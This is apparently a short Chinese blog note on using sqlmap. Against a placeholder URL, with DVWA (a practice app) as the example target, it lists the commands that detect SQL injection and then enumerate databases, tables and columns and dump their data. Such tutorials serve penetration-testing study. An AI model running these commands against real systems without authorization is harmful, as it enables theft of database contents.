1、检测url是否存在注入

sqlmap -u "url" --batch   ,--batch是让sqlmap自动选择执行过程中出现的询问请求

sqlmap使用笔记

如果存在注入,就出提示某个参数是可被攻击的,如下图;

sqlmap使用笔记

2、列出系统所有的数据库名

sqlmap -u "url" --dbs --batch

sqlmap使用笔记

在最后就会出现数据库名:

sqlmap使用笔记

3、得到了数据库名,然后就是爆表名:

sqlmap -u "url" -D 数据库名 --tables

sqlmap使用笔记

得到dvwa数据库所有的表名

sqlmap使用笔记

4、有了表名,然后爆列名

sqlmap -u "url" -D 数据库名 -T 表名 --columns

sqlmap使用笔记

被报出来的列名

sqlmap使用笔记

5、列出某列的数据

sqlmap -u url -D 数据库名 -T 表名 -C  "列名,列名" --dump --batch

sqlmap使用笔记

sqlmap使用笔记

 

相关文章:

  • 2022-01-23
  • 2021-07-17
  • 2021-11-02
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-08-30
  • 2022-12-23
相关资源
相似解决方案